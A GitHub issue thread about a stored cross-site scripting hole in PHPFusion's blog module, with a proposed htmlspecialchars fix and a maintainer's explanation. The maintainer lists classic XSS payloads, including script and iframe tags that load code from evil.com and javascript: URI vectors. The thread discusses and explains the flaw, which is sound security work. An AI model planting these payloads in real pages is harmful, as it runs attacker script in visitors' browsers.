### ISSUE TITLE
Possible XSS in Blog-Module

### ISSUE THREAD

**Issue by user9209** [PHPFusion/PHPFusion#1928]
Hello,

there may a XSS vulnerability in the Blog-Module.

If an author of a blog is including malicious javascript code in his content and the administator did not recognize that, this code is called on every client reading the blog entry or even by only reading the blog list.

To prevent this, maybe a Markdown-language can be used instead of pure HTML code.
Filtering some constructs or showing a hint for the admin may also help to protect against this vulnerability.

Regards,
user9209

![demo](https://user-images.githubusercontent.com/9293951/34604256-634726ec-f207-11e7-926b-398a5e47c28e.PNG)

**Comment by user9209** [comment]
As an fast and easy workaround you can use the htmlspecialchars at outputing the content.
As a result, only plaintext would work as all html-tags are shown.
See 
https://github.com/user9209/PHP-Fusion/tree/XSS-Fix-9.00
https://github.com/user9209/PHP-Fusion/tree/XSS-Fix-9.03

So it is only to protect against this xss scenario.

![unpatched_patched](https://user-images.githubusercontent.com/9293951/34696598-be4a41a8-f4cf-11e7-811f-f77c88c83f45.PNG)

**Comment by meangczac** [comment]
Hello, thanks for pointing out the issue.

When we enable HTML, we already understand the possibilities of XSS, and we had still gone through with that on assumption one would not attack his or her own site.

Going  on with a HTML based input is a project management's decision.

For those who are not familiar with XSS, I'll detail out some explanation regarding this.

Cross Site Forgery Scripting Attacks (widely known as XSS) is a form of "client side" attack where when your browser views it, trigger and executes a malicious payload directly to your computer.

**Some examples of Cross Site Scripting:**

````<script>```` tag
The <script> tag is the most straight forward as pointed out by @user9209 

````<script src=http://evil.com/xss.js></script>````
````<script>alert('XSS');</script>````

But the list doesn't stop there. These are also valid XSS forms.

````<body>```` tag using onload
````<body onload=alert('XSS')>````
````<body background='javascript:alert('XSS')'>````

````<img>```` tag
````<img src='javascript: alert('XSS')'>````

````<iframe>```` tag
````<iframe src=`http://www.evil.com/xss.html'>````

````<input>```` tag
````<input type='image' src='javascript:alert('XSS');'>````

````<link>```` tag
````<link rel='stylesheet' href='javascript:alert('XSS');'>````

````<table>```` tag
````<table background='javascript:alert('XSS')'>````

````<div>```` tag
````<div style='background-image: url(javascript:alert('XSS'))'>````
````<div style='width: expression((javascript:alert('XSS'))'>````

In conclusion regarding this issue, we have a lot of ways if one would want to attack one self site.  Every single tag in **HTML is vulnerable to XSS**, unless we do not allow HTML. 

**As for submissions system**
We could only assume that you know that Blog submissions and News Submissions shall only be enabled to the Member that you can hold accountability for. If you have been attacked by your own member, and the admin approves such script to be displayed, the Super Administrator will have 2 people identified and to account for all bad things. 

That being side, submissions will never be public enabled, ever.

**The only solution**
We do have BBCode to replace and to substitute the system input should there is a request for it. We are waiting for such request and then we will evaluate the potential system adjustments.  The main reason last time, was because we wanted to cater for upgraded users who runs on HTML. 

_And for such purpose of integrating BBCodes:_

function ````parse_textarea()```` is the already built to accept both BBCode and HTML. This function decode entities and the same time decode BBCode, and eval user. You can find out about the function in our API library.
